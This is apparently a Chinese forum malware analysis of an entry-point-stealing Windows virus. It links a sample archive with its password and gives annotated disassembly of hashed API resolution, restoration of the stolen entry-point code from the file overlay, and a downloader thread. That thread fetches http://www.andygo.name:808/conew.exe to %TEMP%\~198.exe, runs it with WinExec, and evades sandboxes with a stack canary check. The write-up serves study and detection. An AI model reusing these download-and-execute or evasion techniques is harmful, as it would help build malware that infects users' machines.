前段时间看的一个抽取入口点代码(EP 窃取,把宿主入口处的一段代码搬到附加数据里,运行时再写回)的病毒,这个比较简单,新手看看,老鸟就飞吧!分析比较仓促,如有不对请指正!
vir.rar
(485.32 KB, 下载次数: 30)
解压密码 :123
1. 首先取得 kernel32.dll 的基址,接着解析若干 API 地址;注意 GetApi 的第二个参数是一个 32 位常量而不是函数名字符串,很可能是导出名的哈希(同一常量 0A412FD89h 在后面的第二阶段和线程代码里也用来取 LoadLibraryA);
; First-stage stub in the host's .text (the host entry point has been
; redirected here).  0x20 bytes of locals, ebx/esi/edi preserved.
; APIs are resolved with GetApi(hModule, constant); the constant is
; presumably a hash of the export name (no strings are used).
.text:00405AA1 push ebp
.text:00405AA2 mov ebp, esp
.text:00405AA4 sub esp, 20h
.text:00405AA7 push ebx
.text:00405AA8 push esi
.text:00405AA9 push edi
.text:00405AAA call GetKernel ; eax = kernel32.dll base address
.text:00405AAF mov esi, eax ; esi = kernel32 base, reused for every GetApi call below
.text:00405AB1 push 0A412FD89h ; arg 2: constant for LoadLibraryA (same value as at 0x15603B and 0x156312)
.text:00405AB6 push esi ; arg 1: hModule = kernel32
.text:00405AB7 mov [ebp+var_14], esi ; var_14 = kernel32 base for now; it is read and CALLED at 0x405BB9/0x405BC3, so it must be reassigned (to the allocated second-stage buffer) in the part of the stub not shown here
.text:00405ABA call GetApi ; -> LoadLibraryA
.text:00405ABF push 2D6D019h ; constant for LocalAlloc (also in the second-stage table at 0x1560BC)
.text:00405AC4 push esi
.text:00405AC5 mov edi, eax ; edi = LoadLibraryA
.text:00405AC7 call GetApi ; -> kernel32.LocalAlloc
.text:00405AC7 ; ... rest of the stub (allocating the buffer and copying the second stage into it) is not reproduced in the writeup
2. 病毒新分配了一块内存来干活(第二阶段代码被拷进去后再调用),所以前面的代码没什么可看的,我们直接跳到它新开的那块内存;下面这段是第一阶段的收尾:
; Tail of the first-stage stub: tear down the frame and hand over to the
; second stage that was copied into the LocalAlloc'd buffer.
.text:00405BB9 mov eax, [ebp+var_14] ; eax = address of the second stage (var_14 was the kernel32 base at 0x405AB7, so it is overwritten in the unshown part)
.text:00405BBC pop edi
.text:00405BBD pop esi
.text:00405BBE pop ebx
.text:00405BBF mov esp, ebp
.text:00405BC1 pop ebp ; frame gone: esp is back to what it was when the host EP was entered
.text:00405BC2 push ecx ; sole argument, read by the second stage as [ebp+8] and used as the host entry point (0x156256, 0x156271); where ecx is loaded is not shown
.text:00405BC3 call eax ; run the second stage. It never returns here: its epilogue does add esp,8 / jmp eax (0x1562C8) straight to the restored EP
.text:00405BC3 ; (the author dumped this buffer from memory; it is listed below as seg000)
3. 接着看dump的,还是先拿kernel32的地址
; Second stage (memory dump).  0x1B0 bytes of locals.
; 0x15602F-0x156111 fill an 11-entry table of {slot pointer, constant}
; pairs, 8 bytes each, starting at [ebp-184h]; the loop at 0x15613E
; resolves each entry.  Slot -> API (per the author's labels at 0x156161,
; confirmed by the later indirect calls):
;   [ebp-120h] LoadLibraryA    [ebp-1B0h] GetModuleFileNameA  [ebp-194h] CreateFileA
;   [ebp-190h] GetFileSize     [ebp-188h] SetFilePointer      [ebp-11Ch] ReadFile
;   [ebp-0Ch]  LocalAlloc      [ebp-1A0h] VirtualProtect      [ebp-14h]  CloseHandle
;   [ebp-128h] LocalFree       [ebp-19Ch] CreateThread
seg000:00156018 push ebp
seg000:00156019 mov ebp, esp
seg000:0015601B sub esp, 1B0h
seg000:00156021 push ebx
seg000:00156022 push esi
seg000:00156023 push edi
seg000:00156024 call sub_155FA8 ; result is later added to the absolute constant 0x1000AAA0 (0x1562AE), so presumably a load delta / base for the virus body -- not verified
seg000:00156029 mov [ebp-18Ch], eax
seg000:0015602F lea eax, [ebp-120h] ; entry 0: slot for LoadLibraryA
seg000:00156035 mov [ebp-184h], eax
seg000:0015603B mov dword ptr [ebp-180h], 0A412FD89h ; LoadLibraryA (same constant as in the first-stage stub)
seg000:00156045 lea ecx, [ebp-1B0h] ; entry 1: GetModuleFileNameA
seg000:0015604B mov [ebp-17Ch], ecx
seg000:00156051 mov dword ptr [ebp-178h], 60F43F1Bh
seg000:0015605B lea edx, [ebp-194h] ; entry 2: CreateFileA
seg000:00156061 mov [ebp-174h], edx
seg000:00156067 mov dword ptr [ebp-170h], 38C62A7Ah
seg000:00156071 lea eax, [ebp-190h] ; entry 3: GetFileSize
seg000:00156077 mov [ebp-16Ch], eax
seg000:0015607D mov dword ptr [ebp-168h], 9554EFE7h
seg000:00156087 lea ecx, [ebp-188h] ; entry 4: SetFilePointer
seg000:0015608D mov [ebp-164h], ecx
seg000:00156093 mov dword ptr [ebp-160h], 0A9D1FD70h
seg000:0015609D lea edx, [ebp-11Ch] ; entry 5: ReadFile
seg000:001560A3 mov [ebp-15Ch], edx
seg000:001560A9 mov dword ptr [ebp-158h], 0BE25545h
seg000:001560B3 lea eax, [ebp-0Ch] ; entry 6: LocalAlloc
seg000:001560B6 mov [ebp-154h], eax
seg000:001560BC mov dword ptr [ebp-150h], 2D6D019h ; same constant as in the first-stage stub
seg000:001560C6 lea ecx, [ebp-1A0h] ; entry 7: VirtualProtect
seg000:001560CC mov [ebp-14Ch], ecx
seg000:001560D2 mov dword ptr [ebp-148h], 0C5FF2F46h
seg000:001560DC lea edx, [ebp-14h] ; entry 8: CloseHandle
seg000:001560DF mov [ebp-144h], edx
seg000:001560E5 mov dword ptr [ebp-140h], 0C0D6D616h
seg000:001560EF lea eax, [ebp-128h] ; entry 9: LocalFree (no call to it appears in the excerpts)
seg000:001560F5 mov [ebp-13Ch], eax
seg000:001560FB mov dword ptr [ebp-138h], 405AD3CDh
seg000:00156105 lea ecx, [ebp-19Ch] ; entry 10: CreateThread
seg000:0015610B mov [ebp-134h], ecx
seg000:00156111 mov dword ptr [ebp-130h], 0C6387EB5h
seg000:0015611B call GetKernel32Address ; eax = kernel32 base; presumably stored to [ebp-8], which the loop below passes to GetApi (store not shown)
4. 拿到了kernel32的地址接着就拿api了,一共11个;
; Resolve loop over the 11-entry table built above.  [ebp-12Ch] is the
; entry index; its increment and the loop back-edge (XREF 0x15612D) are
; outside the excerpt.
seg000:0015613E loc_15613E: ; CODE XREF: seg000:0015612Dj
seg000:0015613E cmp dword ptr [ebp-12Ch], 0Bh ; 11 entries
seg000:00156145 jnb short loc_156177 ; unsigned compare: exit once index >= 11
seg000:00156147 nop ; eight bytes of nop -- padding only, no effect
seg000:00156148 nop
seg000:00156149 nop
seg000:0015614A nop
seg000:0015614B nop
seg000:0015614C nop
seg000:0015614D nop
seg000:0015614E nop
seg000:0015614F mov eax, [ebp-12Ch] ; eax = index
seg000:00156155 mov ecx, [ebp+eax*8-180h] ; ecx = constant of entry eax (entry = {slot ptr at -184h, constant at -180h}, 8 bytes apart)
seg000:0015615C push ecx ; arg 2: constant (export-name hash, presumably)
seg000:0015615D mov edx, [ebp-8] ; kernel32 base (assumed stored here after GetKernel32Address; the store is not in the listing)
seg000:00156160 push edx ; arg 1: hModule
seg000:00156161 call GetApi ; GetApi(hModule, constant) -> API address; it must then be written through the entry's slot pointer, since those slots are called later (e.g. 0x156185) -- that store is not shown
seg000:00156161 ; Resolved in table order (index 0..10):
seg000:00156161 ; LoadLibraryA
seg000:00156161 ; GetModuleFileNameA
seg000:00156161 ; CreateFileA
seg000:00156161 ; GetFileSize
seg000:00156161 ; SetFilePointer
seg000:00156161 ; ReadFile
seg000:00156161 ; LocalAlloc
seg000:00156161 ; VirtualProtect
seg000:00156161 ; CloseHandle
seg000:00156161 ; LocalFree
seg000:00156161 ; CreateThread
5.现在开始恢复入口点代码
; Restore the stolen entry-point code.  The stub opens its own host file,
; seeks to the 0x958-byte overlay at the end, reads it, makes the EP page
; writable and copies the first 0x740 bytes back over the entry point.
; NOTE(review): not one return value is checked (CreateFileA, ReadFile,
; VirtualProtect): a missing or truncated overlay would overwrite the EP
; with whatever the zeroed buffer contains and the host would crash.
seg000:00156177 loc_156177: ; CODE XREF: seg000:00156145j
seg000:00156177 push 104h ; nSize = MAX_PATH
seg000:0015617C lea eax, [ebp-118h]
seg000:00156182 push eax ; lpFilename buffer
seg000:00156183 push 0 ; hModule = NULL -> path of the running host .exe
seg000:00156185 call dword ptr [ebp-1B0h] ; GetModuleFileNameA
seg000:0015618B push 0 ; hTemplateFile
seg000:0015618D push 0 ; dwFlagsAndAttributes
seg000:0015618F push 4 ; dwCreationDisposition = OPEN_ALWAYS
seg000:00156191 push 0 ; lpSecurityAttributes
seg000:00156193 push 1 ; dwShareMode = FILE_SHARE_READ
seg000:00156195 push 80000000h ; dwDesiredAccess = GENERIC_READ
seg000:0015619A lea ecx, [ebp-118h]
seg000:001561A0 push ecx ; lpFileName = own path
seg000:001561A1 call dword ptr [ebp-194h] ; CreateFileA: open the host file read-only
seg000:001561A7 mov [ebp-1ACh], eax ; hFile (INVALID_HANDLE_VALUE not checked)
seg000:001561AD mov edx, 1000ACD0h ; the two absolute values are labels from the virus's own image; their difference 0x740 is the length of the stolen EP code
seg000:001561B2 sub edx, 1000A590h
seg000:001561B8 add edx, 218h ; 0x740 + 0x218 = 0x958 = total overlay size
seg000:001561BE mov [ebp-124h], edx ; [ebp-124h] = 0x958 (doubles as ReadFile's bytes-read output below)
seg000:001561C4 lea eax, [ebp-198h]
seg000:001561CA push eax ; lpFileSizeHigh
seg000:001561CB mov ecx, [ebp-1ACh]
seg000:001561D1 push ecx
seg000:001561D2 call dword ptr [ebp-190h] ; GetFileSize
seg000:001561D8 mov [ebp-10h], eax ; file size low dword (not used in the excerpt)
seg000:001561DB push 2 ; dwMoveMethod = FILE_END
seg000:001561DD push 0 ; lpDistanceToMoveHigh
seg000:001561DF mov edx, 1000ACD0h
seg000:001561E4 sub edx, 1000A590h
seg000:001561EA add edx, 218h
seg000:001561F0 neg edx ; -0x958
seg000:001561F2 push edx ; lDistanceToMove
seg000:001561F3 mov eax, [ebp-1ACh]
seg000:001561F9 push eax
seg000:001561FA call dword ptr [ebp-188h] ; SetFilePointer(hFile, -0x958, NULL, FILE_END): seek to the start of the overlay
seg000:001561FA ; The overlay (data appended after the last section) is what is
seg000:001561FA ; wanted: the original entry-point code was moved there.
seg000:00156200 mov ecx, 1000ACD0h
seg000:00156205 sub ecx, 1000A590h
seg000:0015620B add ecx, 218h ; 0x740 + 0x218 = 0x958 (hex). The author splits the overlay into three parts:
seg000:0015620B ; 1. original entry-point code, 0x740 bytes
seg000:0015620B ; 2. encrypted URL, 0x104 bytes
seg000:0015620B ; 3. name, 0x114 bytes
seg000:0015620B ; NOTE(review): the thread code decodes 0x104 bytes of each and reads the name at URL+0x114 (0x1562F7), which fits 0x114 (URL slot) + 0x104 (name slot) = 0x218; confirm the split against the overlay
seg000:00156211 push ecx ; uBytes = 0x958
seg000:00156212 push 40h ; '@' ; uFlags = LPTR (fixed, zero-initialised)
seg000:00156214 call dword ptr [ebp-0Ch] ; LocalAlloc
seg000:00156217 mov [ebp-1A8h], eax ; overlay buffer
seg000:0015621D push 0 ; lpOverlapped
seg000:0015621F lea edx, [ebp-124h]
seg000:00156225 push edx ; lpNumberOfBytesRead (same slot that holds the count)
seg000:00156226 mov eax, [ebp-124h]
seg000:0015622C push eax ; nNumberOfBytesToRead = 0x958
seg000:0015622D mov ecx, [ebp-1A8h]
seg000:00156233 push ecx ; lpBuffer (ecx = 0x156510 in the author's run)
seg000:00156233 ;
seg000:00156234 mov edx, [ebp-1ACh]
seg000:0015623A push edx
seg000:0015623B call dword ptr [ebp-11Ch] ; ReadFile: overlay -> buffer (result and byte count not checked)
seg000:00156241 lea eax, [ebp-1A4h]
seg000:00156247 push eax ; lpflOldProtect
seg000:00156248 push 40h ; '@' ; PAGE_EXECUTE_READWRITE
seg000:0015624A mov ecx, 1000ACD0h
seg000:0015624F push ecx ; dwSize = 0x740
seg000:00156256 mov edx, [ebp+8]
seg000:00156259 push edx ; lpAddress = host entry point ([ebp+8], the ecx pushed by the first stage)
seg000:00156259 ;
seg000:0015625A call dword ptr [ebp-1A0h] ; kernel32.VirtualProtect: make the EP range RWX (never restored in the excerpt)
seg000:00156260 mov ecx, 1000ACD0h
seg000:00156265 sub ecx, 1000A590h ; ecx = 0x740
seg000:0015626B mov esi, [ebp-1A8h] ; src = overlay buffer (first 0x740 bytes = original EP code)
seg000:00156271 mov edi, [ebp+8] ; dst = entry point
seg000:00156274 mov eax, ecx
seg000:00156276 shr ecx, 2
seg000:00156279 rep movsd ; memcpy(EP, overlay, 0x740): copy the original code back over the entry point
seg000:0015627B mov ecx, eax
seg000:0015627D and ecx, 3
seg000:00156280 rep movsb ; tail bytes (0x740 is a multiple of 4, so none here)
seg000:00156282 mov ecx, [ebp-1ACh]
seg000:00156288 push ecx
seg000:00156289 call dword ptr [ebp-14h] ; kernel32.CloseHandle(hFile)
6. 再创建一个线程干坏事(入口点代码此时已经恢复,线程参数 [ebp-4] 在 0x156289 到 0x1562A1 之间赋值,这段没有列出;从线程代码的用法看,它指向加密的网址/文件名数据):
; CreateThread(NULL, 0, 0x1000AAA0 + delta, [ebp-4], 0, NULL) -- starts the
; downloader thread; the main thread goes on to jump to the restored EP.
seg000:001562A1 push 0 ; lpThreadId
seg000:001562A3 push 0 ; dwCreationFlags
seg000:001562A5 mov eax, [ebp-4]
seg000:001562A8 push eax ; lpParameter: assigned between 0x156289 and 0x1562A1 (not shown); the thread treats it as the encrypted URL with the file name at +0x114 (0x1562E9-0x1562F7)
seg000:001562A9 mov ecx, 1000AAA0h ; absolute label of the thread routine in the virus image ...
seg000:001562AE add ecx, [ebp-18Ch] ; ... rebased with the value sub_155FA8 returned at 0x156024
seg000:001562B4 push ecx ; lpStartAddress (listed below at 0x1562D8)
seg000:001562B5 push 0 ; dwStackSize
seg000:001562B7 push 0 ; lpThreadAttributes
seg000:001562B9 call dword ptr [ebp-19Ch] ; CreateThread
7.线程代码如下,就是个下载者。
; Downloader thread.  [ebp+8] = pointer to the encrypted URL; the encrypted
; file name sits 0x114 bytes after it.  Flow: decode strings -> if
; <system dir>+<name> already exists, stop -> otherwise fetch the URL to
; <temp>\~198.exe with URLDownloadToFileA and run it with WinExec.
; IOCs visible in the listing: http://www.andygo.name:808/conew.exe,
; brpcss.dll under the system directory, %TEMP%\~198.exe.
; Every DLL name is built byte-by-byte on the stack (no string constants).
seg000:001562D8 push ebp
seg000:001562D9 mov ebp, esp
seg000:001562DB sub esp, 348h
seg000:001562E1 push ebx
seg000:001562E2 push esi
seg000:001562E3 push edi
seg000:001562E4 call sub_155FA8 ; same helper as at 0x156024; result unused in the excerpt
seg000:001562E9 mov edi, [ebp+8] ; edi = thread parameter (encrypted URL)
seg000:001562EC push 104h ; length 0x104
seg000:001562F1 push edi
seg000:001562F2 call decode ; decode(url, 0x104) in place -> "http://www.andygo.name:808/conew.exe" (per the author's dynamic run)
seg000:001562F7 add edi, 114h ; edi = encrypted file name, 0x114 bytes after the URL
seg000:001562FD push 104h
seg000:00156302 push edi
seg000:00156303 call decode ; decode(name, 0x104) -> "brpcss.dll"
seg000:00156308 add esp, 10h ; cdecl cleanup for the two decode calls
seg000:0015630B call GetKernel32Address
seg000:00156310 mov ebx, eax ; ebx = kernel32 base (until 0x156489, where ebx is reused)
seg000:00156312 push 0A412FD89h ; LoadLibraryA constant (same as 0x405AB1)
seg000:00156317 push ebx
seg000:00156318 call GetApi
seg000:0015631D mov [ebp-34h], eax ; [ebp-34h] = LoadLibraryA
seg000:0015631D ;
seg000:00156320 nop
seg000:00156321 nop
seg000:00156322 mov byte ptr [ebp-0Ch], 73h ; 's' ; build "shlwapi.dll" in two steps: first "shlw\0\0i.dll" ...
seg000:00156326 mov byte ptr [ebp-0Bh], 68h ; 'h'
seg000:0015632A mov byte ptr [ebp-0Ah], 6Ch ; 'l'
seg000:0015632E mov byte ptr [ebp-9], 77h ; 'w'
seg000:00156332 mov byte ptr [ebp-8], 0
seg000:00156336 mov byte ptr [ebp-7], 0
seg000:0015633A mov byte ptr [ebp-6], 69h ; 'i'
seg000:0015633E mov byte ptr [ebp-5], 2Eh ; '.'
seg000:00156342 mov byte ptr [ebp-4], 64h ; 'd'
seg000:00156346 mov byte ptr [ebp-3], 6Ch ; 'l'
seg000:0015634A mov byte ptr [ebp-2], 6Ch ; 'l'
seg000:0015634E mov byte ptr [ebp-1], 0
seg000:00156352 nop
seg000:00156353 nop
seg000:00156354 lea ecx, [ebp-0Ch]
seg000:00156357 mov byte ptr [ebp-8], 61h ; 'a' ; ... then patch in "ap" so no contiguous "shlwapi" literal ever appears in the code
seg000:0015635B push ecx
seg000:0015635C mov byte ptr [ebp-7], 70h ; 'p'
seg000:00156360 call eax ; eax still = LoadLibraryA -> LoadLibraryA("shlwapi.dll")
seg000:00156362 push 0A98F1FDBh
seg000:00156367 push eax ; hModule = shlwapi
seg000:00156368 call GetApi ; -> shlwapi.PathFileExistsA
seg000:0015636D push 1475BB1Ah
seg000:00156372 push ebx ; hModule = kernel32
seg000:00156373 mov [ebp-38h], eax ; [ebp-38h] = PathFileExistsA
seg000:00156376 call GetApi ; -> kernel32.GetSystemDirectoryA
seg000:0015637B lea edx, [ebp-30h]
seg000:0015637E mov esi, eax ; esi = GetSystemDirectoryA
seg000:00156380 push edx ; pointer to the buffer filled just below
seg000:00156381 mov byte ptr [ebp-30h], 75h ; 'u' ; "user32.dll"
seg000:00156385 mov byte ptr [ebp-2Fh], 73h ; 's'
seg000:00156389 mov byte ptr [ebp-2Eh], 65h ; 'e'
seg000:0015638D mov byte ptr [ebp-2Dh], 72h ; 'r'
seg000:00156391 mov byte ptr [ebp-2Ch], 33h ; '3'
seg000:00156395 mov byte ptr [ebp-2Bh], 32h ; '2'
seg000:00156399 mov byte ptr [ebp-2Ah], 2Eh ; '.'
seg000:0015639D mov byte ptr [ebp-29h], 64h ; 'd'
seg000:001563A1 mov byte ptr [ebp-28h], 6Ch ; 'l'
seg000:001563A5 mov byte ptr [ebp-27h], 6Ch ; 'l'
seg000:001563A9 mov byte ptr [ebp-26h], 0
seg000:001563AD call dword ptr [ebp-34h] ; LoadLibraryA("user32.dll")
seg000:001563B0 push 789F5271h
seg000:001563B5 push eax ; hModule = user32
seg000:001563B6 call GetApi
seg000:001563BB mov [ebp-3Ch], eax ; [ebp-3Ch] = user32.wsprintfA
seg000:001563BE lea eax, [ebp-140h]
seg000:001563C4 push 104h ; uSize
seg000:001563C9 push eax ; lpBuffer = [ebp-140h]
seg000:001563CA call esi ; GetSystemDirectoryA -> e.g. "C:\WINDOWS\system32" (no trailing backslash)
seg000:001563CA ;
seg000:001563CC or ecx, 0FFFFFFFFh ; inline strlen of the decoded name (edi still points at it from 0x1562F7)
seg000:001563CF xor eax, eax
seg000:001563D1 repne scasb
seg000:001563D3 not ecx ; ecx = strlen(name) + 1
seg000:001563D5 sub edi, ecx ; edi back to the start of the name
seg000:001563D7 lea edx, [ebp-140h]
seg000:001563DD mov esi, edi ; src = name
seg000:001563DF mov edi, edx ; dst = system-directory buffer
seg000:001563E1 mov edx, ecx ; edx = bytes to copy (incl. NUL)
seg000:001563E3 or ecx, 0FFFFFFFFh
seg000:001563E6 repne scasb ; find the NUL of the system-directory string
seg000:001563E8 dec edi ; edi = position of that NUL
seg000:001563E9 mov ecx, edx
seg000:001563EB shr ecx, 2
seg000:001563EE rep movsd ; strcat(sysdir, name)
seg000:001563F0 mov ecx, edx
seg000:001563F2 lea eax, [ebp-140h]
seg000:001563F8 and ecx, 3
seg000:001563FB push eax ; pszPath = sysdir + name
seg000:001563FC rep movsb
seg000:001563FE call dword ptr [ebp-38h] ; shlwapi.PathFileExistsA
seg000:00156401 test eax, eax
seg000:00156403 jnz loc_1564FB ; already present -> skip the download (presumably an "already installed" marker; NOTE: since GetSystemDirectoryA adds no backslash, the decoded name likely starts with '\' -- verify)
seg000:00156409 push 16EF74Bh ; WinExec constant
seg000:0015640E push ebx ; hModule = kernel32
seg000:0015640F mov byte ptr [ebp-18h], 75h ; 'u' ; "urlmon.dll"
seg000:00156413 mov byte ptr [ebp-17h], 72h ; 'r'
seg000:00156417 mov byte ptr [ebp-16h], 6Ch ; 'l'
seg000:0015641B mov byte ptr [ebp-15h], 6Dh ; 'm'
seg000:0015641F mov byte ptr [ebp-14h], 6Fh ; 'o'
seg000:00156423 mov byte ptr [ebp-13h], 6Eh ; 'n'
seg000:00156427 mov byte ptr [ebp-12h], 2Eh ; '.'
seg000:0015642B mov byte ptr [ebp-11h], 64h ; 'd'
seg000:0015642F mov byte ptr [ebp-10h], 6Ch ; 'l'
seg000:00156433 mov byte ptr [ebp-0Fh], 6Ch ; 'l'
seg000:00156437 mov [ebp-0Eh], al ; NUL terminator: al is 0 here because the jnz above fell through with eax == 0
seg000:0015643A call GetApi
seg000:0015643F mov edi, eax ; edi = kernel32.WinExec
seg000:00156441 mov eax, 16118A5Dh ; canary written BELOW esp, in memory the next call will use as stack
seg000:00156446 mov [esp-800h], eax
seg000:0015644D lea ecx, [ebp-18h]
seg000:00156450 push ecx
seg000:00156451 call dword ptr [ebp-34h] ; LoadLibraryA("urlmon.dll")
seg000:00156454 mov [ebp-34h], eax ; [ebp-34h] = urlmon base (LoadLibraryA no longer needed)
seg000:00156457 mov eax, [esp-800h] ; read the canary back
seg000:0015645E mov [ebp-38h], eax
seg000:00156461 cmp dword ptr [ebp-38h], 16118A5Dh
seg000:00156468 jz loc_1564FB ; unchanged -> abort. A real LoadLibraryA (loader + urlmon DllMain) uses far more than 0x800 bytes of stack and clobbers it, so this looks like an emulator/sandbox check: a stubbed LoadLibrary leaves the canary intact -- verify. The same constant is reused below as the URLDownloadToFileA lookup value
seg000:0015646E push 0B929DC95h
seg000:00156473 push ebx ; hModule = kernel32
seg000:00156474 call GetApi ; -> GetTempPathA
seg000:00156479 mov edx, [ebp-34h] ; urlmon base
seg000:0015647C push 16118A5Dh
seg000:00156481 push edx
seg000:00156482 mov esi, eax ; esi = GetTempPathA
seg000:00156484 call GetApi
seg000:00156489 mov ebx, eax ; ebx = urlmon.URLDownloadToFileA (ebx no longer holds kernel32)
seg000:0015648B lea eax, [ebp-348h]
seg000:00156491 push eax ; lpBuffer for the temp path
seg000:00156492 push 104h ; nBufferLength
seg000:00156497 mov byte ptr [ebp-24h], 25h ; '%' ; format string "%s~198.exe"
seg000:0015649B mov byte ptr [ebp-23h], 73h ; 's'
seg000:0015649F mov byte ptr [ebp-22h], 7Eh ; '~'
seg000:001564A3 mov byte ptr [ebp-21h], 31h ; '1'
seg000:001564A7 mov byte ptr [ebp-20h], 39h ; '9'
seg000:001564AB mov byte ptr [ebp-1Fh], 38h ; '8'
seg000:001564AF mov byte ptr [ebp-1Eh], 2Eh ; '.'
seg000:001564B3 mov byte ptr [ebp-1Dh], 65h ; 'e'
seg000:001564B7 mov byte ptr [ebp-1Ch], 78h ; 'x'
seg000:001564BB mov byte ptr [ebp-1Bh], 65h ; 'e'
seg000:001564BF mov byte ptr [ebp-1Ah], 0
seg000:001564C3 call esi ; GetTempPathA(0x104, [ebp-348h]) -> "<temp>\" (with trailing backslash)
seg000:001564C5 lea ecx, [ebp-348h]
seg000:001564CB lea edx, [ebp-24h]
seg000:001564CE push ecx ; arg: temp path
seg000:001564CF lea eax, [ebp-244h]
seg000:001564D5 push edx ; format
seg000:001564D6 push eax ; destination [ebp-244h]
seg000:001564D7 call dword ptr [ebp-3Ch] ; user32.wsprintfA -> "<temp>\~198.exe"
seg000:001564DA mov edx, [ebp+8] ; decoded URL "http://www.andygo.name:808/conew.exe"
seg000:001564DD add esp, 0Ch ; cdecl cleanup for wsprintfA
seg000:001564E0 lea ecx, [ebp-244h]
seg000:001564E6 push 0 ; lpfnCB
seg000:001564E8 push 0 ; dwReserved
seg000:001564EA push ecx ; szFileName = "<temp>\~198.exe"
seg000:001564EB push edx ; szURL
seg000:001564EC push 0 ; pCaller
seg000:001564EE call ebx ; urlmon.URLDownloadToFileA (HRESULT not checked: WinExec runs regardless of whether the download succeeded)
seg000:001564F0 lea eax, [ebp-244h]
seg000:001564F6 push 5 ; uCmdShow = SW_SHOW
seg000:001564F8 push eax ; lpCmdLine = downloaded file
seg000:001564F9 call edi ; WinExec: run the downloaded payload
8. 主线程在 CreateThread 返回后(下载线程与之并行运行)立即跳回入口点继续执行;由于入口点代码已经恢复,这次运行的是正常程序了。注意这段收尾用 add esp,8 丢掉返回地址和入口点参数后直接 jmp,并不返回到第一阶段的 call 之后:
; Second-stage epilogue: instead of returning to the first-stage stub, drop
; the return address plus the one argument and jump to the restored entry
; point with the stack exactly as the host originally saw it.
seg000:001562BF mov eax, [ebp+8] ; eax = host entry point (the argument pushed at 0x405BC2)
seg000:001562C2 pop edi
seg000:001562C3 pop esi
seg000:001562C4 pop ebx
seg000:001562C5 mov esp, ebp
seg000:001562C7 pop ebp
seg000:001562C8 add esp, 8 ; discard return address (4) + the EP argument (4): esp is back to its value at original EP entry
seg000:001562CB jmp eax ; transfer to the original, now-restored program code